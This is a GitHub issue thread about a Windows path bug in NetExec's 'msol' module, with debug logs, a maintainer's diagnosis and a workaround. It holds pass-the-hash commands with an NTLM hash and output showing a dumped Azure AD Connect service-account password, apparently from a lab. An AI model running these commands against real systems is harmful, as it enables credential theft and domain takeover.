### ISSUE TITLE
'/tmp/msol.ps1' does not exist!

### ISSUE THREAD

**Issue by ronen1n** [Pennyw0rth/NetExec#145]
**Describe the bug**
I get error that the file does not exist, and my friend run this command from his workstation on the same server, and it worked for him

**To Reproduce**
Steps to reproduce the behavior i.e.:
Command: `.\nxc.exe smb US-ADCONNECT -u us\helpdeskadmin -H 94b4a7961bb45377f6e7951b0d8630be -M msol`
Resulted in:
```
SMB         192.168.1.209   445    US-ADCONNECT     [*] Windows 10.0 Build 17763 x64 (name:US-ADCONNECT) (domain:us.techcorp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.209   445    US-ADCONNECT     [+] us\helpdeskadmin:94b4a7961bb45377f6e7951b0d8630be (Pwn3d!)
MSOL        192.168.1.209   445    US-ADCONNECT     [-] Impersonate file specified '/tmp/msol.ps1' does not exist!
```

NetExec info

OS: Windows server 2019
Version of nxc: 1.1.0

**Comment by NeffIsBack** [comment]
If you still have access to the network can you provide the debug output?

**Comment by ronen1n** [comment]
> If you still have access to the network can you provide the debug output?

```
.\nxc.exe --debug smb US-ADCONNECT -u us\helpdeskadmin -H 94b4a7961bb45377f6e7951b0d8630be -M msol
[14:26:10] DEBUG    PYTHON VERSION: 3.11.6 (tags/v3.11.6:8b6ee5b, Oct  2 2023, 14:57:12) [MSC v.1935 64 bit (AMD64)]                                                                                                                             netexec.py:89
           DEBUG    RUNNING ON: Windows Release: 10                                                                                                                                                                                              netexec.py:90
           DEBUG    Passed args: Namespace(threads=100, timeout=None, jitter=None, no_progress=False, verbose=False, debug=True, version=False, protocol='smb', target=['US-ADCONNECT'], cred_id=[], username=['us\\helpdeskadmin'],             netexec.py:91
                    password=[], ignore_pw_decoding=False, kerberos=False, no_bruteforce=False, continue_on_success=False, use_kcache=False, log=None, aesKey=None, kdcHost=None, gfail_limit=None, ufail_limit=None, fail_limit=None,
                    module=['msol'], module_options=[], list_modules=False, show_module_options=False, server='https', server_host='0.0.0.0', server_port=None, connectback_host=None, hash=['94b4a7961bb45377f6e7951b0d8630be'], delegate=None,
                    no_s4u2proxy=False, domain=None, local_auth=False, port=445, share='C$', smb_server_port=445, gen_relay_list=None, smb_timeout=2, laps=None, sam=False, lsa=False, ntds=None, dpapi=None, mkfile=None, pvk=None,
                    enabled=False, userntds=None, shares=False, no_write_check=False, filter_shares=None, sessions=False, disks=False, loggedon_users_filter=None, loggedon_users=False, users=None, groups=None, computers=None,
                    local_groups=None, pass_pol=False, rid_brute=None, wmi=None, wmi_namespace='root\\cimv2', spider=None, spider_folder='.', content=False, exclude_dirs='', pattern=None, regex=None, depth=None, only_files=False,
                    put_file=None, get_file=None, append_host=False, exec_method=None, dcom_timeout=5, get_output_tries=5, codec='utf-8', force_ps32=False, no_output=False, execute=None, ps_execute=None, obfs=False, amsi_bypass=None,
                    clear_obfscripts=False)
           DEBUG    Protocol: smb                                                                                                                                                                                                               netexec.py:145
           DEBUG    Protocol Path: C:\Users\STUDEN~1\AppData\Local\Temp\3\_MEI22082\nxc\protocols\smb.py                                                                                                                                        netexec.py:148
           DEBUG    Protocol DB Path: C:\Users\STUDEN~1\AppData\Local\Temp\3\_MEI22082\nxc\protocols\smb\database.py                                                                                                                            netexec.py:150
           DEBUG    Protocol Object: <class 'protocol.smb'>                                                                                                                                                                                     netexec.py:153
[14:26:11] DEBUG    Protocol DB Object: <class 'protocol.database'>                                                                                                                                                                             netexec.py:155
           DEBUG    DB Path: C:\Users\studentuser55/.nxc\workspaces\default\smb.db                                                                                                                                                              netexec.py:158
           DEBUG    symmetric using "pyCryptodomex" for "DES"                                                                                                                                                                                   __init__.py:55
           DEBUG    symmetric using "pyCryptodomex" for "TDES"                                                                                                                                                                                  __init__.py:55
           DEBUG    symmetric using "pyCryptodomex" for "AES"                                                                                                                                                                                   __init__.py:55
           DEBUG    symmetric using "pyCryptodomex" for "RC4"                                                                                                                                                                                   __init__.py:55
           DEBUG    Modules to be Loaded: ['msol'], <class 'list'>                                                                                                                                                                              netexec.py:186
           DEBUG    Loading module msol at path C:\Users\STUDEN~1\AppData\Local\Temp\3\_MEI22082\nxc\modules\msol.py                                                                                                                            netexec.py:192
           DEBUG    Supported protocols: ['smb']                                                                                                                                                                                            moduleloader.py:68
           DEBUG    Protocol: smb                                                                                                                                                                                                           moduleloader.py:69
           DEBUG    proto_object: <class 'protocol.smb'>, type: <class 'type'>                                                                                                                                                                  netexec.py:226
           DEBUG    proto object dir: ['__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getstate__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__',     netexec.py:227
                    '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', 'call_cmd_args', 'call_modules', 'check_if_admin',
                    'config', 'create_conn_obj', 'create_smbv1_conn', 'create_smbv3_conn', 'disks', 'domainfromdnshostname', 'domainfromdsn', 'dpapi', 'enable_remoteops', 'enum_host_info', 'execute', 'gen_relay_list', 'get_dc_ips',
                    'get_file', 'get_os_arch', 'groups', 'hash_login', 'hosts', 'inc_failed_login', 'kerberos_login', 'laps_search', 'local_groups', 'loggedon_users', 'login', 'lsa', 'mark_pwned', 'ntds', 'over_fail_limit',
                    'parse_credentials', 'pass_pol', 'plaintext_login', 'print_host_info', 'proto_args', 'proto_flow', 'proto_logger', 'ps_execute', 'put_file', 'query_db_creds', 'rid_brute', 'sam', 'sessions', 'shares', 'spider',
                    'try_credentials', 'users', 'wmi']
           DEBUG    proto object module after adding: [<NXCModule.NXCModule object at 0x0000023BDD6F5B90>]                                                                                                                                      netexec.py:232
           DEBUG    Using proactor: IocpProactor                                                                                                                                                                                        proactor_events.py:633
           DEBUG    Creating ThreadPoolExecutor                                                                                                                                                                                                  netexec.py:47
           DEBUG    Creating thread for <class 'protocol.smb'>                                                                                                                                                                                   netexec.py:50
           INFO     Socket info: host=192.168.1.209, hostname=US-ADCONNECT, kerberos=False, ipv6=False, link-local ipv6=False                                                                                                                connection.py:103
           DEBUG    Kicking off proto_flow                                                                                                                                                                                                   connection.py:163
           INFO     Error creating SMBv1 connection to 192.168.1.209: Error occurs while reading from remote(10054)                                                                                                                                 smb.py:598
           DEBUG    Created connection object                                                                                                                                                                                                connection.py:166
           DEBUG    Update Hosts: [{'id': 9, 'ip': '192.168.1.209', 'hostname': 'US-ADCONNECT', 'domain': 'us.techcorp.local', 'os': 'Windows 10.0 Build 17763', 'dc': None, 'smbv1': False, 'signing': False, 'spooler': None, 'zerologon':   database.py:280
                    None, 'petitpotam': None}]
           DEBUG    add_host() - Host IDs Updated: [9]                                                                                                                                                                                         database.py:290
           DEBUG    Error logging off system: Error occurs while reading from remote(10054)                                                                                                                                                         smb.py:249
SMB         192.168.1.209   445    US-ADCONNECT     [*] Windows 10.0 Build 17763 x64 (name:US-ADCONNECT) (domain:us.techcorp.local) (signing:False) (SMBv1:False)
[14:26:12] INFO     SMB         192.168.1.209   445    US-ADCONNECT     [*] Windows 10.0 Build 17763 x64 (name:US-ADCONNECT) (domain:us.techcorp.local) (signing:False) (SMBv1:False)                                                            logger.py:145
           INFO     Error creating SMBv1 connection to 192.168.1.209: Error occurs while reading from remote(10054)                                                                                                                                 smb.py:598
           DEBUG    Adding credentials: [{'id': 1, 'domain': 'us', 'username': 'helpdeskadmin', 'password': '94b4a7961bb45377f6e7951b0d8630be', 'credtype': 'hash', 'pillaged_from_hostid': None}]                                             database.py:347
           DEBUG    smb hosts() - results: [(9, '192.168.1.209', 'US-ADCONNECT', 'us.techcorp.local', 'Windows 10.0 Build 17763', None, False, False, None, None, None)]                                                                       database.py:495
SMB         192.168.1.209   445    US-ADCONNECT     [+] us\helpdeskadmin:94b4a7961bb45377f6e7951b0d8630be (Pwn3d!)
           INFO     SMB         192.168.1.209   445    US-ADCONNECT     [+] us\helpdeskadmin:94b4a7961bb45377f6e7951b0d8630be (Pwn3d!)                                                                                                           logger.py:145
           DEBUG    smb hosts() - results: [(9, '192.168.1.209', 'US-ADCONNECT', 'us.techcorp.local', 'Windows 10.0 Build 17763', None, False, False, None, None, None)]                                                                       database.py:495
           DEBUG    Calling modules                                                                                                                                                                                                          connection.py:170
           DEBUG    Loading module msol - <NXCModule.NXCModule object at 0x0000023BDD6F5B90>                                                                                                                                                 connection.py:204
           DEBUG    Loading context for module msol - <NXCModule.NXCModule object at 0x0000023BDD6F5B90>                                                                                                                                     connection.py:214
           DEBUG    Module msol has on_admin_login method                                                                                                                                                                                    connection.py:228
MSOL        192.168.1.209   445    US-ADCONNECT     [-] Impersonate file specified '/tmp/msol.ps1' does not exist!
           INFO     MSOL        192.168.1.209   445    US-ADCONNECT     [-] Impersonate file specified '/tmp/msol.ps1' does not exist!                                                                                                           logger.py:145
           ```

**Comment by NeffIsBack** [comment]
It's working on my side:
<img width="678" alt="image" src="https://github.com/Pennyw0rth/NetExec/assets/61382599/4212d81b-1a58-4217-8416-3140c2b2bac9">

This is likely because of something preventing python to write to `/tmp` on your operating system. Maybe not enough privileges or something like that? See: https://github.com/Pennyw0rth/NetExec/blob/8899c003c8daecdc828074308a60e3da823414b0/nxc/modules/msol.py#L51-L59

Otherwise you could try `-M msol -o MSOL_PS1=<PATH_TO_NXC>/nxc/data/msol_dump/msol_dump.ps1` (in my case `~/.local/pipx/venvs/netexec/lib64/python3.11/site-packages/nxc/data/msol_dump/msol_dump.ps1`)

**Comment by ronen1n** [comment]
I'm not sure if it supposed to be like this, but I found temp folder that created when I run the command on c:\ called _MEI10202 and deleted right after it finish running, but now with these commands I see it creates it on C:\Users\studentuser55\AppData\Local\Temp\3\  that I have 7 random _MEI11242 folders, and it also creates on more when I run the command and deletes it when it finishes
I copied the folder to my desktop and put the path like you said and it worked

```
.\nxc.exe smb us-adconnect -u helpdeskadmin -H 94b4a7961bb45377f6e7951b0d -M msol -o MSOL_PS1=C:\Users\studentuser55\Desktop\_MEI10202\nxc\data\msol_dump\msol_dump.ps1
SMB         192.168.1.209   445    US-ADCONNECT     [*] Windows 10.0 Build 17763 x64 (name:US-ADCONNECT) (domain:us.techcorp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.209   445    US-ADCONNECT     [+] us.techcorp.local\helpdeskadmin:94b4a7961bb45377f6e7951b0d (Pwn3d!)
MSOL        192.168.1.209   445    US-ADCONNECT     [*] Uploading msol.ps1
MSOL        192.168.1.209   445    US-ADCONNECT     [+] Msol script successfully uploaded
MSOL        192.168.1.209   445    US-ADCONNECT     [*] Executing the script
MSOL        192.168.1.209   445    US-ADCONNECT     [*] Querying ADSync localdb (mms_server_configuration)
MSOL        192.168.1.209   445    US-ADCONNECT     [*] Querying ADSync localdb (mms_management_agent)
MSOL        192.168.1.209   445    US-ADCONNECT     [*] Using xp_cmdshell to run some Powershell as the service user
MSOL        192.168.1.209   445    US-ADCONNECT     Domain: techcorp.local
MSOL        192.168.1.209   445    US-ADCONNECT     Username: MSOL_16fb75d0227d
MSOL        192.168.1.209   445    US-ADCONNECT     Password: 70&n1{p!Mb7K.C)/USO.a{@m*%.+^230@KAc[+sr}iF>Xv{1!{=/}}3B.T8IW-{)^Wj^zbyOc=Ahi]n=S7K$wAr;sOlb
MSOL        192.168.1.209   445    US-ADCONNECT     [+] Msol script successfully deleted
```

**Comment by NeffIsBack** [comment]
What do you mean exactly? If there are folders left over on the target system we should probably check that they are removed in the future.

**Comment by ronen1n** [comment]
> What do you mean exactly? If there are folders left over on the target system we should probably check that they are removed in the future.

No, not on the target, on my pc it look like temp folder to run the nxc app like your folder in `~/.local/pipx/venvs/netexec/lib64/python3.11/site-packages/nxc/data`

**Comment by NeffIsBack** [comment]
Hey, not sure why i didn't respond anymore, but now looking at the code it was an obvious bug when using windows and is now fixed in #244
